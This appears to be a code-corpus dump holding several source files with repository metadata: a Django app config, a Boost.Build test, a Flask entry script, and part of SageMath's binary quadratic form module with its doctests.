9bd8105e457f6feb8c38fa94b335e54783fca99e
|
[
"bzip2-1.0.6"
] | 456
|
2019-01-12T11:01:13.000Z
|
2022-03-30T17:06:52.000Z
|
from django.apps import AppConfig
class Ps1Config(AppConfig):
name = 'ps1'
| 13.5
| 33
| 0.728395
|
4a143c9921e7b90bbdbcb8e9dc5d4caba638f04b
| 1,144
|
py
|
Python
|
tools/build/v2/test/core_actions_quietly.py
|
jmuskaan72/Boost
|
047e36c01841a8cd6a5c74d4e3034da46e327bc1
|
[
"BSL-1.0"
] | 198
|
2015-01-13T05:47:18.000Z
|
2022-03-09T04:46:46.000Z
|
tools/build/v2/test/core_actions_quietly.py
|
xiaoliang2121/Boost
|
fc90c3fde129c62565c023f091eddc4a7ed9902b
|
[
"BSL-1.0"
] | 4
|
2015-03-19T08:23:23.000Z
|
2019-06-24T07:48:47.000Z
|
tools/build/v2/test/core_actions_quietly.py
|
xiaoliang2121/Boost
|
fc90c3fde129c62565c023f091eddc4a7ed9902b
|
[
"BSL-1.0"
] | 139
|
2015-01-15T20:09:31.000Z
|
2022-01-31T15:21:16.000Z
|
#!/usr/bin/python
# Copyright 2007 Rene Rivera.
# Copyright 2011 Steven Watanabe
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
import BoostBuild
t = BoostBuild.Tester(pass_toolset=0)
t.write("file.jam", """
actions quietly .a.
{
echo [$(<:B)] 0
echo [$(<:B)] 1
echo [$(<:B)] 2
}
rule .a.
{
DEPENDS $(<) : $(>) ;
}
NOTFILE subtest ;
.a. subtest_a : subtest ;
.a. subtest_b : subtest ;
DEPENDS all : subtest_a subtest_b ;
""")
t.run_build_system("-ffile.jam -d2", stdout="""...found 4 targets...
...updating 2 targets...
.a. subtest_a
echo [subtest_a] 0
echo [subtest_a] 1
echo [subtest_a] 2
[subtest_a] 0
[subtest_a] 1
[subtest_a] 2
.a. subtest_b
echo [subtest_b] 0
echo [subtest_b] 1
echo [subtest_b] 2
[subtest_b] 0
[subtest_b] 1
[subtest_b] 2
...updated 2 targets...
""")
t.run_build_system("-ffile.jam -d1", stdout="""...found 4 targets...
...updating 2 targets...
...updated 2 targets...
""")
t.cleanup()
| 19.066667
| 83
| 0.594406
|
4a143cdff8f8226b2f208d0ef1469dfef9738c76
| 919
|
py
|
Python
|
run.py
|
BrechtDewilde1/RoadToRotterdam
|
4531ee5d082215b29197781435c2f5a61a5607dc
|
[
"MIT"
] | null | null | null |
run.py
|
BrechtDewilde1/RoadToRotterdam
|
4531ee5d082215b29197781435c2f5a61a5607dc
|
[
"MIT"
] | null | null | null |
run.py
|
BrechtDewilde1/RoadToRotterdam
|
4531ee5d082215b29197781435c2f5a61a5607dc
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from flask_migrate import Migrate
from sys import exit
from decouple import config
from apps.config import config_dict
from apps import create_app, db
# WARNING: Don't run with debug turned on in production!
DEBUG = config('DEBUG', default=True, cast=bool)
# The configuration
get_config_mode = 'Debug' if DEBUG else 'Production'
try:
# Load the configuration using the default values
app_config = config_dict[get_config_mode.capitalize()]
except KeyError:
exit('Error: Invalid <config_mode>. Expected values [Debug, Production] ')
app = create_app(app_config)
Migrate(app, db)
if DEBUG:
app.logger.info('DEBUG = ' + str(DEBUG))
app.logger.info('Environment = ' + get_config_mode)
app.logger.info('DBMS = ' + app_config.SQLALCHEMY_DATABASE_URI)
if __name__ == "__main__":
app.run(debug = True)
| 24.837838
| 78
| 0.712731
|
4a143e4148739ed033a54d5c155b8c9b27c2b094
| 52,993
|
py
|
Python
|
src/sage/quadratic_forms/binary_qf.py
|
dimpase/sagetrac-mirror
|
473cd41f19ec23df7e207391cfb0cf41c7c4ef46
|
[
"BSL-1.0"
] | 10
|
2018-06-01T21:54:53.000Z
|
2022-03-14T20:11:34.000Z
|
src/sage/quadratic_forms/binary_qf.py
|
dimpase/sagetrac-mirror
|
473cd41f19ec23df7e207391cfb0cf41c7c4ef46
|
[
"BSL-1.0"
] | 2
|
2021-04-02T20:43:29.000Z
|
2021-04-05T23:38:58.000Z
|
src/sage/quadratic_forms/binary_qf.py
|
dimpase/sagetrac-mirror
|
473cd41f19ec23df7e207391cfb0cf41c7c4ef46
|
[
"BSL-1.0"
] | 15
|
2020-07-23T10:46:25.000Z
|
2022-01-25T15:37:24.000Z
|
"""
Binary Quadratic Forms with Integer Coefficients
This module provides a specialized class for working with a binary quadratic
form `a x^2 + b x y + c y^2`, stored as a triple of integers `(a, b, c)`.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q
x^2 + 2*x*y + 3*y^2
sage: Q.discriminant()
-8
sage: Q.reduced_form()
x^2 + 2*y^2
sage: Q(1, 1)
6
TESTS::
sage: Q == loads(dumps(Q))
True
AUTHORS:
- Jon Hanke (2006-08-08):
- Appended to add the methods :func:`BinaryQF_reduced_representatives`,
:meth:`~BinaryQF.is_reduced`, and ``__add__`` on 8-3-2006 for Coding Sprint
#2.
- Added Documentation and :meth:`~BinaryQF.complex_point` method on 8-8-2006.
- Nick Alexander: add doctests and clean code for Doc Days 2
- William Stein (2009-08-05): composition; some ReSTification.
- William Stein (2009-09-18): make immutable.
- Justin C. Walker (2011-02-06):
- Add support for indefinite forms.
"""
# ****************************************************************************
# Copyright (C) 2006-2009 William Stein and Jon Hanke
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from functools import total_ordering
from sage.libs.pari.all import pari_gen
from sage.rings.all import ZZ, is_fundamental_discriminant
from sage.arith.all import gcd
from sage.structure.sage_object import SageObject
from sage.matrix.matrix_space import MatrixSpace
from sage.matrix.constructor import Matrix
from sage.misc.cachefunc import cached_method
@total_ordering
class BinaryQF(SageObject):
r"""
A binary quadratic form over `\ZZ`.
INPUT:
One of the following:
- ``a`` -- either a 3-tuple of integers, or a quadratic
homogeneous polynomial in two variables with integer
coefficients
- ``a``, ``b``, ``c`` -- three integers
OUTPUT:
the binary quadratic form a*x^2 + b*x*y + c*y^2.
EXAMPLES::
sage: b = BinaryQF([1, 2, 3])
sage: b.discriminant()
-8
sage: b1 = BinaryQF(1, 2, 3)
sage: b1 == b
True
sage: R.<x, y> = ZZ[]
sage: BinaryQF(x^2 + 2*x*y + 3*y^2) == b
True
sage: BinaryQF(1, 0, 1)
x^2 + y^2
"""
def __init__(self, a, b=None, c=None):
r"""
Create a binary quadratic form `ax^2 + bxy + cy^2`.
INPUT:
One of the following:
- ``a`` -- either a 3-tuple of integers, or a quadratic
homogeneous polynomial in two variables with integer
coefficients
- ``a``, ``b``, ``c`` -- three integers
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3]); Q
x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([1, 2])
Traceback (most recent call last):
...
TypeError: binary quadratic form must be given by a quadratic homogeneous bivariate integer polynomial or its coefficients
sage: R.<x, y> = ZZ[]
sage: f = x^2 + 2*x*y + 3*y^2
sage: BinaryQF(f)
x^2 + 2*x*y + 3*y^2
sage: BinaryQF(f + x)
Traceback (most recent call last):
...
TypeError: binary quadratic form must be given by a quadratic homogeneous bivariate integer polynomial or its coefficients
TESTS::
sage: BinaryQF(0)
0
"""
from sage.rings.polynomial.multi_polynomial_element import is_MPolynomial
if b is None and c is None:
if (isinstance(a, (list, tuple))
and len(a) == 3):
a, b, c = a
elif a == 0:
a = b = c = 0
elif (is_MPolynomial(a) and a.is_homogeneous() and a.base_ring() == ZZ
and a.degree() == 2 and a.parent().ngens() == 2):
x, y = a.parent().gens()
a, b, c = [a.monomial_coefficient(mon) for mon in [x**2, x*y, y**2]]
elif isinstance(a, pari_gen) and a.type() in ('t_QFI', 't_QFR'):
# a has 3 or 4 components
a, b, c = a[0], a[1], a[2]
try:
self._a = ZZ(a)
self._b = ZZ(b)
self._c = ZZ(c)
except TypeError:
raise TypeError('binary quadratic form must be given by a quadratic homogeneous bivariate integer polynomial or its coefficients')
self._poly = None
def _pari_init_(self):
"""
Convert this quadratic form to PARI.
EXAMPLES::
sage: f = BinaryQF([2, 3, 4]); f
2*x^2 + 3*x*y + 4*y^2
sage: f._pari_init_()
'Qfb(2,3,4)'
sage: pari(f)
Qfb(2, 3, 4)
sage: type(pari(f))
<... 'cypari2.gen.Gen'>
sage: gp(f)
Qfb(2, 3, 4)
sage: type(gp(f))
<class 'sage.interfaces.gp.GpElement'>
"""
return 'Qfb(%s,%s,%s)' % (self._a, self._b, self._c)
def __mul__(self, right):
"""
Gauss composition or right action by a 2x2 integer matrix.
The result need not be reduced.
EXAMPLES:
We explicitly compute in the group of classes of positive
definite binary quadratic forms of discriminant -23::
sage: R = BinaryQF_reduced_representatives(-23, primitive_only=False); R
[x^2 + x*y + 6*y^2, 2*x^2 - x*y + 3*y^2, 2*x^2 + x*y + 3*y^2]
sage: R[0] * R[0]
x^2 + x*y + 6*y^2
sage: R[1] * R[1]
4*x^2 + 3*x*y + 2*y^2
sage: (R[1] * R[1]).reduced_form()
2*x^2 + x*y + 3*y^2
sage: (R[1] * R[1] * R[1]).reduced_form()
x^2 + x*y + 6*y^2
sage: q1 = BinaryQF(1, 1, 4)
sage: M = Matrix(ZZ, [[1, 3], [0, 1]])
sage: q1*M
x^2 + 7*x*y + 16*y^2
sage: q1.matrix_action_right(M)
x^2 + 7*x*y + 16*y^2
sage: N = Matrix(ZZ, [[1, 0], [1, 0]])
sage: q1*(M*N) == q1.matrix_action_right(M).matrix_action_right(N)
True
"""
# Either a "right" action by
# ...or Gaussian composition
if isinstance(right, BinaryQF):
return BinaryQF(self.__pari__().qfbcompraw(right))
# ...or a 2x2 matrix...
if (isinstance(right.parent(), MatrixSpace)
and right.nrows() == right.ncols() == 2):
aa = right[0, 0]
bb = right[0, 1]
cc = right[1, 0]
dd = right[1, 1]
A = self.polynomial()(aa, cc)
C = self.polynomial()(bb, dd)
B = self.polynomial()(aa + bb, cc + dd) - A - C
qf = BinaryQF(A, B, C)
return qf
raise TypeError("right operand must be a binary quadratic form or 2x2 matrix")
def __getitem__(self, n):
"""
Return the `n`-th component of this quadratic form.
If this form is `a x^2 + b x y + c y^2`, the 0-th component is `a`,
the 1-st component is `b`, and `2`-nd component is `c`.
Indexing is like lists -- negative indices and slices are allowed.
EXAMPLES::
sage: Q = BinaryQF([2, 3, 4])
sage: Q[0]
2
sage: Q[2]
4
sage: Q[:2]
(2, 3)
sage: tuple(Q)
(2, 3, 4)
sage: list(Q)
[2, 3, 4]
"""
return (self._a, self._b, self._c)[n]
def __call__(self, *args):
r"""
Evaluate this quadratic form at a point.
INPUT:
- args -- x and y values, as a pair x, y or a list, tuple, or
vector
EXAMPLES::
sage: Q = BinaryQF([2, 3, 4])
sage: Q(1, 2)
24
TESTS::
sage: Q = BinaryQF([2, 3, 4])
sage: Q([1, 2])
24
sage: Q((1, 2))
24
sage: Q(vector([1, 2]))
24
"""
if len(args) == 1:
args = args[0]
x, y = args
return (self._a * x + self._b * y) * x + self._c * y**2
def __hash__(self):
r"""
TESTS::
sage: hash(BinaryQF([2, 2, 3]))
802
sage: hash(BinaryQF([2, 3, 2]))
562
sage: hash(BinaryQF([3, 2, 2]))
547
"""
return hash(self._a) ^ (hash(self._b) << 4) ^ (hash(self._c) << 8)
def __eq__(self, right):
"""
Return ``True`` if ``self`` and ``right`` are identical.
This means that they have the same coefficients.
EXAMPLES::
sage: P = BinaryQF([2, 2, 3])
sage: Q = BinaryQF([2, 2, 3])
sage: R = BinaryQF([1, 2, 3])
sage: P == Q # indirect doctest
True
sage: P == R # indirect doctest
False
TESTS::
sage: P == P
True
sage: Q == P
True
sage: R == P
False
sage: P == 2
False
"""
if not isinstance(right, BinaryQF):
return False
return (self._a, self._b, self._c) == (right._a, right._b, right._c)
def __ne__(self, right):
"""
Return ``True`` if ``self`` and ``right`` are not identical.
This means that they have different coefficients.
EXAMPLES::
sage: P = BinaryQF([2, 2, 3])
sage: Q = BinaryQF([2, 2, 3])
sage: R = BinaryQF([1, 2, 3])
sage: P != Q # indirect doctest
False
sage: P != R # indirect doctest
True
"""
return not (self == right)
def __lt__(self, right):
"""
Compare the coefficients of ``self`` and ``right``.
This is done lexicographically.
EXAMPLES::
sage: P = BinaryQF([2, 2, 3])
sage: Q = BinaryQF([1, 2, 3])
sage: P < Q
False
sage: Q < P
True
sage: Q <= P
True
"""
if not isinstance(right, BinaryQF):
return False
return (self._a, self._b, self._c) < (right._a, right._b, right._c)
def __add__(self, Q):
"""
Return the component-wise sum of two forms.
Given `a_1 x^2 + b_1 x y + c_1 y^2` and `a_2 x^2 + b_2 x y +
c_2 y^2`, this returns the form `(a_1 + a_2) x^2 + (b_1 + b_2)
x y + (c_1 + c_2) y^2.`
EXAMPLES::
sage: P = BinaryQF([2, 2, 3]); P
2*x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([-1, 2, 2]); Q
-x^2 + 2*x*y + 2*y^2
sage: P + Q
x^2 + 4*x*y + 5*y^2
sage: P + Q == BinaryQF([1, 4, 5]) # indirect doctest
True
TESTS::
sage: Q + P == BinaryQF([1, 4, 5]) # indirect doctest
True
"""
return BinaryQF([self._a + Q._a, self._b + Q._b, self._c + Q._c])
def __sub__(self, Q):
"""
Return the component-wise difference of two forms.
Given two forms `a_1 x^2 + b_1 x y + c_1 y^2` and `a_2 x^2 +
b_2 x y + c_2 y^2`, this returns the form `(a_1 - a_2) x^2 +
(b_1 - b_2) x y + (c_1 - c_2) y^2.`
EXAMPLES::
sage: P = BinaryQF([2, 2, 3]); P
2*x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([-1, 2, 2]); Q
-x^2 + 2*x*y + 2*y^2
sage: P - Q
3*x^2 + y^2
sage: P - Q == BinaryQF([3, 0, 1]) # indirect doctest
True
TESTS::
sage: Q - P == BinaryQF([3, 0, 1]) # indirect doctest
False
sage: Q - P != BinaryQF([3, 0, 1]) # indirect doctest
True
"""
return BinaryQF([self._a - Q._a, self._b - Q._b, self._c - Q._c])
def _repr_(self):
"""
Display the quadratic form.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3]); Q # indirect doctest
x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([-1, 2, 3]); Q
-x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([0, 0, 0]); Q
0
"""
return repr(self.polynomial())
def _latex_(self):
"""
Return latex representation of this binary quadratic form.
EXAMPLES::
sage: f = BinaryQF((778, 1115, 400)); f
778*x^2 + 1115*x*y + 400*y^2
sage: latex(f) # indirect doctest
778 x^{2} + 1115 x y + 400 y^{2}
"""
return self.polynomial()._latex_()
def content(self):
"""
Return the content of the form, i.e., the gcd of the coefficients.
EXAMPLES::
sage: Q = BinaryQF(22, 14, 10)
sage: Q.content()
2
sage: Q = BinaryQF(4, 4, -15)
sage: Q.content()
1
"""
return gcd([self._a, self._b, self._c])
def polynomial(self):
"""
Return ``self`` as a homogeneous 2-variable polynomial.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q.polynomial()
x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([-1, -2, 3])
sage: Q.polynomial()
-x^2 - 2*x*y + 3*y^2
sage: Q = BinaryQF([0, 0, 0])
sage: Q.polynomial()
0
"""
# Note: Caching in _poly seems to give a very slight
# improvement (~0.2 usec) in 'timeit()' runs. Not sure it
# is worth the instance variable.
if self._poly is None:
self._poly = self(ZZ['x, y'].gens())
return self._poly
@cached_method
def discriminant(self):
"""
Return the discriminant of ``self``.
Given a form `ax^2 + bxy + cy^2`, this returns `b^2 - 4ac`.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q.discriminant()
-8
"""
return self._b**2 - 4 * self._a * self._c
def determinant(self):
"""
Return the determinant of the matrix associated to ``self``.
The determinant is used by Gauss and by Conway-Sloane, for
whom an integral quadratic form has coefficients `(a, 2b, c)`
with `a`, `b`, `c` integers.
OUTPUT:
The determinant of the matrix::
[ a b/2]
[b/2 c]
as a rational
REMARK:
This is just `-D/4` where `D` is the discriminant. The return
type is rational even if `b` (and hence `D`) is even.
EXAMPLES::
sage: q = BinaryQF(1, -1, 67)
sage: q.determinant()
267/4
"""
return self._a*self._c - (self._b**2)/4
# for consistency with general quadratic form code
det = determinant
@cached_method
def has_fundamental_discriminant(self):
"""
Return if the discriminant `D` of this form is a fundamental
discriminant (i.e. `D` is the smallest element of its
squareclass with `D = 0` or `1` modulo `4`).
EXAMPLES::
sage: Q = BinaryQF([1, 0, 1])
sage: Q.discriminant()
-4
sage: Q.has_fundamental_discriminant()
True
sage: Q = BinaryQF([2, 0, 2])
sage: Q.discriminant()
-16
sage: Q.has_fundamental_discriminant()
False
"""
return is_fundamental_discriminant(self.discriminant())
@cached_method
def is_primitive(self):
r"""
Checks if the form `ax^2 + bxy + cy^2` satisfies
`\gcd(a, b, c) = 1`, i.e., is primitive.
EXAMPLES::
sage: Q = BinaryQF([6, 3, 9])
sage: Q.is_primitive()
False
sage: Q = BinaryQF([1, 1, 1])
sage: Q.is_primitive()
True
sage: Q = BinaryQF([2, 2, 2])
sage: Q.is_primitive()
False
sage: rqf = BinaryQF_reduced_representatives(-23*9, primitive_only=False)
sage: [qf.is_primitive() for qf in rqf]
[True, True, True, False, True, True, False, False, True]
sage: rqf
[x^2 + x*y + 52*y^2,
2*x^2 - x*y + 26*y^2,
2*x^2 + x*y + 26*y^2,
3*x^2 + 3*x*y + 18*y^2,
4*x^2 - x*y + 13*y^2,
4*x^2 + x*y + 13*y^2,
6*x^2 - 3*x*y + 9*y^2,
6*x^2 + 3*x*y + 9*y^2,
8*x^2 + 7*x*y + 8*y^2]
sage: [qf for qf in rqf if qf.is_primitive()]
[x^2 + x*y + 52*y^2,
2*x^2 - x*y + 26*y^2,
2*x^2 + x*y + 26*y^2,
4*x^2 - x*y + 13*y^2,
4*x^2 + x*y + 13*y^2,
8*x^2 + 7*x*y + 8*y^2]
"""
return gcd([self._a, self._b, self._c]) == 1
@cached_method
def is_zero(self):
"""
Return if ``self`` is identically zero.
EXAMPLES::
sage: Q = BinaryQF(195751, 37615, 1807)
sage: Q.is_zero()
False
sage: Q = BinaryQF(0, 0, 0)
sage: Q.is_zero()
True
"""
return self.content() == 0
@cached_method
def is_weakly_reduced(self):
r"""
Check if the form `ax^2 + bxy + cy^2` satisfies
`|b| \leq a \leq c`, i.e., is weakly reduced.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q.is_weakly_reduced()
False
sage: Q = BinaryQF([2, 1, 3])
sage: Q.is_weakly_reduced()
True
sage: Q = BinaryQF([1, -1, 1])
sage: Q.is_weakly_reduced()
True
"""
if self.discriminant() >= 0:
raise ValueError("only defined for negative discriminant")
return (abs(self._b) <= self._a) and (self._a <= self._c)
@cached_method
def is_reducible(self):
r"""
Return if this form is reducible and cache the result.
A binary form `q` is called reducible if it is the product of
two linear forms `q = (a x + b y) (c x + d y)`, or
equivalently if its discriminant is a square.
EXAMPLES::
sage: q = BinaryQF([1, 0, -1])
sage: q.is_reducible()
True
"""
return self.discriminant().is_square()
def _reduce_indef(self, transformation=False):
"""
Reduce an indefinite, non-reduced form.
INPUT:
- ``transformation`` -- bool (default: ``False``); if ``True``,
return both the reduced form and a matrix transforming
``self`` into the reduced form.
TESTS::
sage: f = BinaryQF(-1, 0, 3)
sage: f._reduce_indef(transformation=False)
-x^2 + 2*x*y + 2*y^2
sage: red, trans = f._reduce_indef(transformation=True)
sage: red
-x^2 + 2*x*y + 2*y^2
sage: trans
[-1 1]
[ 0 -1]
sage: red == f*trans
True
sage: f = BinaryQF(0, 5, 24)
sage: red, trans = f._reduce_indef(transformation=True)
sage: red == f*trans
True
"""
if transformation:
U = Matrix(ZZ, 2, 2, [1, 0, 0, 1])
d = self.discriminant().sqrt(prec=53)
Q = self
while not Q.is_reduced():
a = Q._a
b = Q._b
c = Q._c
cabs = c.abs()
# rho(f) as defined in [BUVO2007]_ p. 112 equation (6.12)
if cabs != 0:
if cabs >= d:
s = c.sign() * ((cabs + b) / (2 * cabs)).floor()
else:
s = c.sign() * ((d + b) / (2 * cabs)).floor()
if transformation:
T = Matrix(ZZ, 2, 2, [0, -1, 1, s])
U = U * T
Q = BinaryQF(c, -b + 2*s*c, c*s*s - b*s + a)
else:
if b < 0:
Q = BinaryQF(a, -b, c)
if transformation:
T = Matrix(ZZ, 2, 2, [1, 0, 0, -1])
U = U * T
else:
q, r = a.quo_rem(b)
if 2*r > b:
q, r = a.quo_rem(-b)
q = -q
if transformation:
T = Matrix(ZZ, 2, 2, [1, 0, -q, 1])
U = U * T
Q = BinaryQF(r, b, c)
if transformation:
return Q, U
return Q
@cached_method
def reduced_form(self, transformation=False, algorithm="default"):
"""
Return a reduced form equivalent to ``self``.
INPUT:
- ``self`` -- binary quadratic form of non-square discriminant
- ``transformation`` -- boolean (default: False): if ``True``, return
both the reduced form and a matrix transforming ``self`` into the
reduced form. Currently only implemented for indefinite forms.
- ``algorithm`` -- String. The algorithm to use: Valid options are:
* ``'default'`` -- Let Sage pick an algorithm (default).
* ``'pari'`` -- use PARI
* ``'sage'`` -- use Sage
.. SEEALSO::
:meth:`is_reduced`
EXAMPLES::
sage: a = BinaryQF([33, 11, 5])
sage: a.is_reduced()
False
sage: b = a.reduced_form(); b
5*x^2 - x*y + 27*y^2
sage: b.is_reduced()
True
sage: a = BinaryQF([15, 0, 15])
sage: a.is_reduced()
True
sage: b = a.reduced_form(); b
15*x^2 + 15*y^2
sage: b.is_reduced()
True
Examples of reducing indefinite forms::
sage: f = BinaryQF(1, 0, -3)
sage: f.is_reduced()
False
sage: g = f.reduced_form(); g
x^2 + 2*x*y - 2*y^2
sage: g.is_reduced()
True
sage: q = BinaryQF(1, 0, -1)
sage: q.reduced_form()
x^2 + 2*x*y
sage: BinaryQF(1, 9, 4).reduced_form(transformation=True)
(
[ 0 -1]
4*x^2 + 7*x*y - y^2, [ 1 2]
)
sage: BinaryQF(3, 7, -2).reduced_form(transformation=True)
(
[1 0]
3*x^2 + 7*x*y - 2*y^2, [0 1]
)
sage: BinaryQF(-6, 6, -1).reduced_form(transformation=True)
(
[ 0 -1]
-x^2 + 2*x*y + 2*y^2, [ 1 -4]
)
"""
if self.is_reduced():
if transformation:
return self, Matrix(ZZ, 2, 2, [1, 0, 0, 1])
else:
return self
if algorithm == "default":
if self.is_reducible() or (self.discriminant() > 0 and transformation):
algorithm = 'sage'
elif not transformation:
algorithm = 'pari'
else:
raise NotImplementedError('reduction of definite binary '
'quadratic forms with transformation=True is not '
'implemented')
if algorithm == 'sage':
if self.discriminant() <= 0:
raise NotImplementedError('reduction of definite binary '
'quadratic forms is not implemented in Sage')
return self._reduce_indef(transformation)
elif algorithm == 'pari':
if transformation:
raise NotImplementedError('transformation=True is not '
'supported using PARI')
elif self.is_reducible():
raise NotImplementedError('reducible forms are not '
'supported using PARI')
return BinaryQF(self.__pari__().qfbred())
else:
raise ValueError('unknown implementation for binary quadratic form '
'reduction: %s' % algorithm)
# Buchmann/Vollmer cycle algorithm
def _RhoTau(self):
"""
Apply Rho and Tau operators to this form, returning a new form `Q`.
EXAMPLES::
sage: f = BinaryQF(1, 8, -3)
sage: f._RhoTau()
3*x^2 + 4*x*y - 5*y^2
"""
d = self.discriminant().sqrt(prec=53)
a = self._a
b = self._b
c = self._c
cabs = c.abs()
sign = c.sign()
if cabs >= d:
s = sign * ((cabs+b) / (2*cabs)).floor()
else:
s = sign * ((d+b) / (2*cabs)).floor()
Q = BinaryQF(-c, -b + 2*s*c, -(a - b*s + c*s*s))
return Q
def _Rho(self):
"""
Apply the Rho operator to this form, returning a new form `Q`.
EXAMPLES::
sage: f = BinaryQF(1, 8, -3)
sage: f._Rho()
-3*x^2 + 4*x*y + 5*y^2
"""
d = self.discriminant().sqrt(prec=53)
a = self._a
b = self._b
c = self._c
cabs = c.abs()
sign = c.sign()
if cabs >= d:
s = sign * ((cabs+b) / (2*cabs)).floor()
else:
s = sign * ((d+b) / (2*cabs)).floor()
Q = BinaryQF(c, -b + 2*s*c, a - b*s + c*s*s)
return Q
def _Tau(self):
"""
Apply the Tau operator to this form, returning a new form `Q`.
EXAMPLES::
sage: f = BinaryQF(1, 8, -3)
sage: f._Tau()
-x^2 + 8*x*y + 3*y^2
"""
a = self._a
b = self._b
c = self._c
Q = BinaryQF(-a, b, -c)
return Q
def cycle(self, proper=False):
"""
Return the cycle of reduced forms to which ``self`` belongs.
This is based on Algorithm 6.1 of [BUVO2007]_.
INPUT:
- ``self`` -- reduced, indefinite form of non-square discriminant
- ``proper`` -- boolean (default: ``False``); if ``True``, return the
proper cycle
The proper cycle of a form `f` consists of all reduced forms that are
properly equivalent to `f`. This is useful when testing for proper
equivalence (or equivalence) between indefinite forms.
The cycle of `f` is a technical tool that is used when computing the proper
cycle. Our definition of the cycle is slightly different from the one
in [BUVO2007]_. In our definition, the cycle consists of all reduced
forms `g`, such that the `a`-coefficient of `g` has the same sign as the
`a`-coefficient of `f`, and `g` can be obtained from `f` by performing a
change of variables, and then multiplying by the determinant of the
change-of-variables matrix. It is important to note that `g` might not be
equivalent to `f` (because of multiplying by the determinant). However,
either 'g' or '-g' must be equivalent to `f`. Also note that the cycle
does contain `f`. (Under the definition in [BUVO2007]_, the cycle might
not contain `f`, because all forms in the cycle are required to have
positive `a`-coefficient, even if the `a`-coefficient of `f` is negative.)
EXAMPLES::
sage: Q = BinaryQF(14, 17, -2)
sage: Q.cycle()
[14*x^2 + 17*x*y - 2*y^2,
2*x^2 + 19*x*y - 5*y^2,
5*x^2 + 11*x*y - 14*y^2]
sage: Q.cycle(proper=True)
[14*x^2 + 17*x*y - 2*y^2,
-2*x^2 + 19*x*y + 5*y^2,
5*x^2 + 11*x*y - 14*y^2,
-14*x^2 + 17*x*y + 2*y^2,
2*x^2 + 19*x*y - 5*y^2,
-5*x^2 + 11*x*y + 14*y^2]
sage: Q = BinaryQF(1, 8, -3)
sage: Q.cycle()
[x^2 + 8*x*y - 3*y^2,
3*x^2 + 4*x*y - 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
2*x^2 + 6*x*y - 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
3*x^2 + 8*x*y - y^2]
sage: Q.cycle(proper=True)
[x^2 + 8*x*y - 3*y^2,
-3*x^2 + 4*x*y + 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
-2*x^2 + 6*x*y + 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
-3*x^2 + 8*x*y + y^2]
sage: Q = BinaryQF(1, 7, -6)
sage: Q.cycle()
[x^2 + 7*x*y - 6*y^2,
6*x^2 + 5*x*y - 2*y^2,
2*x^2 + 7*x*y - 3*y^2,
3*x^2 + 5*x*y - 4*y^2,
4*x^2 + 3*x*y - 4*y^2,
4*x^2 + 5*x*y - 3*y^2,
3*x^2 + 7*x*y - 2*y^2,
2*x^2 + 5*x*y - 6*y^2,
6*x^2 + 7*x*y - y^2]
TESTS:
Check an example in :trac:`28989`::
sage: Q = BinaryQF(1, 1, -1)
sage: Q.cycle(proper=True)
[x^2 + x*y - y^2, -x^2 + x*y + y^2]
This is Example 6.10.6 of [BUVO2007]_::
sage: Q = BinaryQF(1, 7, -6)
sage: Q.cycle()
[x^2 + 7*x*y - 6*y^2,
6*x^2 + 5*x*y - 2*y^2,
2*x^2 + 7*x*y - 3*y^2,
3*x^2 + 5*x*y - 4*y^2,
4*x^2 + 3*x*y - 4*y^2,
4*x^2 + 5*x*y - 3*y^2,
3*x^2 + 7*x*y - 2*y^2,
2*x^2 + 5*x*y - 6*y^2,
6*x^2 + 7*x*y - y^2]
sage: Q.cycle(proper=True)
[x^2 + 7*x*y - 6*y^2,
-6*x^2 + 5*x*y + 2*y^2,
2*x^2 + 7*x*y - 3*y^2,
-3*x^2 + 5*x*y + 4*y^2,
4*x^2 + 3*x*y - 4*y^2,
-4*x^2 + 5*x*y + 3*y^2,
3*x^2 + 7*x*y - 2*y^2,
-2*x^2 + 5*x*y + 6*y^2,
6*x^2 + 7*x*y - y^2,
-x^2 + 7*x*y + 6*y^2,
6*x^2 + 5*x*y - 2*y^2,
-2*x^2 + 7*x*y + 3*y^2,
3*x^2 + 5*x*y - 4*y^2,
-4*x^2 + 3*x*y + 4*y^2,
4*x^2 + 5*x*y - 3*y^2,
-3*x^2 + 7*x*y + 2*y^2,
2*x^2 + 5*x*y - 6*y^2,
-6*x^2 + 7*x*y + y^2]
This is Example 6.10.7 of [BUVO2007]_::
sage: Q = BinaryQF(1, 8, -3)
sage: Q.cycle()
[x^2 + 8*x*y - 3*y^2,
3*x^2 + 4*x*y - 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
2*x^2 + 6*x*y - 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
3*x^2 + 8*x*y - y^2]
sage: Q.cycle(proper=True)
[x^2 + 8*x*y - 3*y^2,
-3*x^2 + 4*x*y + 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
-2*x^2 + 6*x*y + 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
-3*x^2 + 8*x*y + y^2]
sage: Q.cycle(proper=True) # should be the same as the previous one
[x^2 + 8*x*y - 3*y^2,
-3*x^2 + 4*x*y + 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
-2*x^2 + 6*x*y + 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
-3*x^2 + 8*x*y + y^2]
Try an example where a is negative::
sage: Q = BinaryQF(-1, 8, 3)
sage: Q.cycle(proper=True)
